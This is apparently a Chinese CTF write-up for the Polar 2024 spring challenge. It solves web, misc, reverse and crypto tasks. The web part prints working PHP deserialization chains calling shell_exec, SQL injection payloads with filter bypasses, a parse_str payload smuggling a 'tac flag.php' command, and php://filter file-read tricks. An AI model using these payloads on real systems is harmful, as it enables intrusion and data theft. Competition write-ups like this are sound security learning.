Polar 2024春季个人挑战赛
Rank:7
![](https://file.jishuzhan.net/article/1772836141444108290/711d8fdd852caca63dc91d9764ab943d.webp)
【WEB】机器人
开题
![](https://file.jishuzhan.net/article/1772836141444108290/abf28ba5e5871de41660ca9b717a1e36.webp)
起手敏感文件robots.txt
![](https://file.jishuzhan.net/article/1772836141444108290/cd697d4535187c09b1bdcb7b094abd36.webp)
![](https://file.jishuzhan.net/article/1772836141444108290/191bc74a1d85a8dcff48510c2520246f.webp)
【WEB】PHP反序列化初试
最简单的php反序列化
POC:
php
<?php
class Easy{
public $name;
public function __wakeup()
{
echo $this->name;
}
}
class Evil{
public $evil;
private $env;
public function __toString()
{
$this->env=shell_exec($this->evil);
return $this->env;
}
}
$a=new Easy();
$a->name=new Evil();
$a->name->evil='cat f1@g.php';
echo serialize($a);
![](https://file.jishuzhan.net/article/1772836141444108290/9895c547c225b1beafeee84cc0a73be9.webp)
【WEB】file
开题
![](https://file.jishuzhan.net/article/1772836141444108290/c9fcb483618eb5556e3f1fcba034b77a.webp)
![](https://file.jishuzhan.net/article/1772836141444108290/9e4962d571feb41fe03a97f5ba48024b.webp)
点不了开始,直接upload.php
![](https://file.jishuzhan.net/article/1772836141444108290/8001d9f2a76a7fc495d5fd9127cb75b4.webp)
![](https://file.jishuzhan.net/article/1772836141444108290/2eb3a06a6f63c7dbdab43963b5da5455.webp)
【WEB】PlayGame
直接给了源码
![](https://file.jishuzhan.net/article/1772836141444108290/913bc9a6c2879d28b5ae3672ce57fef1.webp)
简单反序列化,POC:
php
<?php
/*
PolarD&N CTF
*/
class User{
public $name;
public $age;
public $sex;
public function __toString()
{
return "name:".$this->name."age:".$this->age."sex:".$this->sex;
}
public function setName($name){
$this->name=$name;
}
public function setAge($age){
$this->$age=$age;
}
public function setSex($sex){
$this->$sex=$sex;
}
}
class PlayGame{
public $user;
public $gameFile="./game";
public function openGame(){
return 1;
//file_get_contents($this->gameFile);
}
public function __destruct()
{
echo $this->user->name."GameOver!";
}
public function __toString(){
return $this->user->name."PlayGame ". $this->user->age . $this->openGame();
}
}
$a=new PlayGame();
$a->user->name=new User();
$a->user->name->name=new PlayGame();
$a->user->name->name->gameFile='../../../../../flag';
unserialize(serialize($a));
![](https://file.jishuzhan.net/article/1772836141444108290/7e1a7f68ec14293e22d8999395e145e6.webp)
【WEB】csdn
开题
![](https://file.jishuzhan.net/article/1772836141444108290/4ad9104d75445e964717b9a70c4b6db5.webp)
存在文件包含
![](https://file.jishuzhan.net/article/1772836141444108290/6ea0378110a3a3b0c084e81646acd737.webp)
被骗了呜呜呜
![](https://file.jishuzhan.net/article/1772836141444108290/db7c35877ef461b231df8290613a143d.webp)
【WEB】search
开题,一眼SQL
![](https://file.jishuzhan.net/article/1772836141444108290/ada7839038da73332f04eace614226c5.webp)
报错注入梭哈了
![](https://file.jishuzhan.net/article/1772836141444108290/1d7618ba348dac371b821b61cfcf4a45.webp)
空格用/**/
,大小写绕过
库:CTF
表:Flag,Students
列:Flag
payload:
query=1'/**/and/**/uPdatexmL(1,coNcat(0x7e,(sELect/**/group_cOncat(Flag)/**/frOm/**/CTF.Flag),0x7e),3)#
query=1'/**/and/**/uPdatexmL(1,coNcat(0x7e,(sELect/**/reverse(group_cOncat(Flag))/**/frOm/**/CTF.Flag),0x7e),3)#
flag{Polar_CTF_426891370wxbglbnfwaq}
![](https://file.jishuzhan.net/article/1772836141444108290/08ee9d2aca14d4ca85412309dd2a8599.webp)
【WEB】PHP_Deserialization
直接给了源码:
php
<?php
/*
PolarD&N CTF
*/
class Polar
{
public $night;
public $night_arg;
public function __wakeup()
{
echo "hacker";
$this->night->hacker($this->night_arg);
}
}
class Night
{
public function __call($name, $arguments)
{
echo "wrong call:" . $name . " arg:" . $arguments[0];
}
}
class Day
{
public $filename="/flag";
public function __toString()
{
$this->filename = str_replace("flag", "", $this->filename);
echo file_get_contents($this->filename);
return $this->filename;
}
}
if (isset($_POST['polar'])) {
unserialize(base64_decode($_POST['polar']));
} else {
highlight_file(__FILE__);
}
双写绕过,POC:
php
<?php
/*
PolarD&N CTF
*/
class Polar
{
public $night;
public $night_arg;
public function __wakeup()
{
echo "hacker";
$this->night->hacker($this->night_arg);
}
}
class Night
{
public function __call($name, $arguments)
{
echo "wrong call:" . $name . " arg:" . $arguments[0];
}
}
class Day
{
public $filename="/flag";
public function __toString()
{
$this->filename = str_replace("flag", "", $this->filename);
echo file_get_contents($this->filename);
return $this->filename;
}
}
$a=new Polar();
$a->night=new Night();
$a->night_arg=new Day();
$a->night_arg->filename='/flflagag';
echo base64_encode(serialize($a));
payload:
Tzo1OiJQb2xhciI6Mjp7czo1OiJuaWdodCI7Tzo1OiJOaWdodCI6MDp7fXM6OToibmlnaHRfYXJnIjtPOjM6IkRheSI6MTp7czo4OiJmaWxlbmFtZSI7czo5OiIvZmxmbGFnYWciO319
![](https://file.jishuzhan.net/article/1772836141444108290/df410c588d564cac3d8ab3fb2d5fd3ca.webp)
【WEB】覆盖
![](https://file.jishuzhan.net/article/1772836141444108290/ed2123e8fa059169ff0c912fb8d51731.webp)
parse_str函数造成变量覆盖
?id=a[0]=www.polarctf.com&cmd=;tac flag.php
![](https://file.jishuzhan.net/article/1772836141444108290/721fdfc701bca2043a7349caeac29b78.webp)
【WEB】uploader
![](https://file.jishuzhan.net/article/1772836141444108290/345b6a5a2a2eae7681e9cbc44765cdd9.webp)
应该是没有过滤,不过得自己写个上传表单
html
<form action="http://e0aced16-e5c4-4e03-8911-e9b3180ea03c.www.polarctf.com:8090/" enctype="multipart/form-data" method="post" >
<input name="file" type="file" />
<input type="submit" type="gogogo!" />
</form>
![](https://file.jishuzhan.net/article/1772836141444108290/abc4482fe9c1cb142241f83c59445426.webp)
![](https://file.jishuzhan.net/article/1772836141444108290/d13b5fa75a939a5a073ae7d847227b95.webp)
![](https://file.jishuzhan.net/article/1772836141444108290/d0a7ab64a578cbfed188779f49e2acfe.webp)
【WEB】phar
直接给了源码
![](https://file.jishuzhan.net/article/1772836141444108290/c41288f814cc4e7cd8b3fbe6c0e55ef1.webp)
读取funs.php
?file=php://filter/read=convert.base64-encode/resource=./funs.php
php
<?php
include 'f1@g.php';
function myWaf($data)
{
if (preg_match("/f1@g/i", $data)) {
echo "NONONONON0!";
return FALSE;
} else {
return TRUE;
}
}
class A
{
private $a;
public function __destruct()
{
echo "A->" . $this->a . "destruct!";
}
}
class B
{
private $b = array();
public function __toString()
{
$str_array= $this->b;
$str2 = $str_array['kfc']->vm50;
return "Crazy Thursday".$str2;
}
}
class C{
private $c = array();
public function __get($kfc){
global $flag;
$f = $this->c[$kfc];
var_dump($$f);
}
}
private全改public
POC:
php
<?php
class A
{
public $a;
public function __destruct()
{
echo "A->" . $this->a . "destruct!";
}
}
class B
{
public $b = array();
public function __toString()
{
$str_array= $this->b;
$str2 = $str_array['kfc']->vm50;
return "Crazy Thursday".$str2;
}
}
class C{
public $c = array();
public function __get($kfc){
global $flag;
$f = $this->c[$kfc];
var_dump($$f);
}
}
$a=new A();
$a->a=new B();
$a->a->b['kfc']=new C();
$b['vm50']='flag';
$a->a->b['kfc']->c=$b;
echo serialize($a);
payload:
?file=f1@g&data=O:1:"A":1:{s:1:"a";O:1:"B":1:{s:1:"b";a:1:{s:3:"kfc";O:1:"C":1:{s:1:"c";a:1:{s:4:"vm50";s:4:"flag";}}}}}
![](https://file.jishuzhan.net/article/1772836141444108290/9d17537b2db3f86533d9207f6d4aca4b.webp)
【WEB】Fastjson*
前言:xalan是java操作xml的库,属于java内置的官方库之一,在CC链中主要用到的是com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl类。与上篇文章中提到的利用链不同,xalan最终是通过加载字节码来达到代码执行的效果,所以xalan更适合于执行语句的场景,利用xalan来植入内存马会比其他链更加方便。如果目标同时可以使用多条CC链,通常会更倾向于使用xalan相关的链。
待我再研究一下
【REVERSE】一个flag劈三瓣儿
打开就有
![](https://file.jishuzhan.net/article/1772836141444108290/fe8084b3d9532df6abdd0cc356deb45f.webp)
【MISC】你懂二维码吗?
解压出现问题打开发现是文件头前多了一串冗余字符,删去成功解压,得到一个需要密码的压缩包,爆破一下发现不行,回到010中查看一下图片,发现类似密码的字符串:
![](https://file.jishuzhan.net/article/1772836141444108290/c748002e9c999b5a395447adf270fc65.webp)
解压果然成功,得到txt打开乱码,010中查看确认到png头,改成png后缀后得到二维码
![](https://file.jishuzhan.net/article/1772836141444108290/74e2ecaa42bd94c2ceb276896e68623f.webp)
flag{zun_du_jia_du}
【MISC】加点儿什么
下载得到一张图片老样子010打开发现文件尾有多于字符,根据特征判断为压缩包,用foremost分离后得到一个cpp文件,需要加入什么东西,观察代码发现只要加入打印得到密文的语句即可:
cpp
#include<bits/stdc++.h>
using namespace std;
#define MAX 100
char ciphertext[MAX]; //密文
char plaintext[MAX]; //明文
int K=4;
void Encryption()
{
cout<<"请输入明文:"<<endl;
gets(plaintext);
cout<<"密文为:"<<endl;
for(int i=0; plaintext[i] != '\0'; i++)
{
if(plaintext[i] >= 'A' && plaintext[i] <= 'Z')
{
ciphertext[i] = (plaintext[i] - 'A' + K) % 26 + 'A';
}
else if (plaintext[i] >= 'a' && plaintext[i] <= 'z')
{
ciphertext[i] = (plaintext[i] - 'a' + K) % 26 + 'a';
}
else
ciphertext[i] = plaintext[i];
cout << ciphertext[i]; // 修改这里,应该打印加密后的密文
}
ciphertext[strlen(plaintext)] = '\0'; // 确保添加字符串终止符
cout << "\n";
}
void Decryption()
{
cout<<"请输入密文:"<<endl;
gets(ciphertext);
cout<<"明文为:"<<endl;
for(int i=0; ciphertext[i] != '\0'; i++)
{
if(ciphertext[i] >= 'A' && ciphertext[i] <= 'Z')
{
plaintext[i] = ((ciphertext[i] - 'A' - K) % 26 + 26) % 26 + 'A';
}
else if (ciphertext[i] >= 'a' && ciphertext[i] <= 'z')
{
plaintext[i] = ((ciphertext[i] - 'a' - K) % 26 + 26) % 26 + 'a';
}
else
plaintext[i] = ciphertext[i];
cout << plaintext[i]; // 修改这里,确保在解密过程中打印每个解密后的字符
}
plaintext[strlen(ciphertext)] = '\0'; // 确保添加字符串终止符
cout << "\n";
}
int main()
{
int n,flag=1;
while(flag)
{
cout<<"请选择(1:加密,2:解密,3:退出):"<<endl;
cin>>n;
getchar(); // 用于捕获并丢弃输入流中的换行符
switch(n)
{
case 1:
Encryption();
break;
case 2:
Decryption();
break;
case 3:exit(0);
}
}
}
flag{372658619FE0707E8C64DB2400B96991}
【CRYPTO】周杰伦的贝斯
附件:
👊👢👧👉👎🐽👅👁👈🐧👉👆👈👣👟👐👊👱🐧🐰👇👈🐴🐴
一眼base100
![](https://file.jishuzhan.net/article/1772836141444108290/f35e53d32cc65009f7913aff9ee203de.webp)
![](https://file.jishuzhan.net/article/1772836141444108290/9f05b0ae0f5a79ff741e35553aadb356.webp)
![](https://file.jishuzhan.net/article/1772836141444108290/38d551894f6843948af7b9fe14681b2b.webp)
【CRYPTO】歌词最后一句
题目描述:找到歌词最后一句MD5加密套上flag
附件:
![](https://file.jishuzhan.net/article/1772836141444108290/ce315f5b0bae5eb95a3bece3d1885976.webp)
跳舞小人是WYDOSNOWSB
11月的肖邦是个专辑,tmd全部试一遍吧。
![](https://file.jishuzhan.net/article/1772836141444108290/37cb0a496cce3c661602babd4a5c2acd.webp)
【CRYPTO】rsaaa
附件:
e = 65537
p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
c =75036747635306642448951304206998877676661823155273906467327033126738852180428655042280881978878498990667216678397370196258985509664476355705024803037163192947063192452198182809379575421727717664980771937882048579654137560876937198021458204902826397562775388222716165902130775042367930795903054668968295345506
脚本:
python
from gmpy2 import *
from Crypto.Util.number import *
import gmpy2
def Decrypt(c,e,p,q):
L=(p-1)*(q-1)
#print(L)
d=gmpy2.invert(e,L) # ed=1+k(p-1)*(q-1)
n=p*q
m=gmpy2.powmod(c,d,n) #m=c^d mod n
flag=str(m)
print("ctfshow{"+flag+"}")
print(long_to_bytes(m))
print(m)
if __name__ == '__main__':
e = 65537
p = 9648423029010515676590551740010426534945737639235739800643989352039852507298491399561035009163427050370107570733633350911691280297777160200625281665378483
q = 11874843837980297032092405848653656852760910154543380907650040190704283358909208578251063047732443992230647903887510065547947313543299303261986053486569407
c = 75036747635306642448951304206998877676661823155273906467327033126738852180428655042280881978878498990667216678397370196258985509664476355705024803037163192947063192452198182809379575421727717664980771937882048579654137560876937198021458204902826397562775388222716165902130775042367930795903054668968295345506
Decrypt(c,e,p,q)
![](https://file.jishuzhan.net/article/1772836141444108290/6db8f40dbfb90c07ad4d03e57c8aee2a.webp)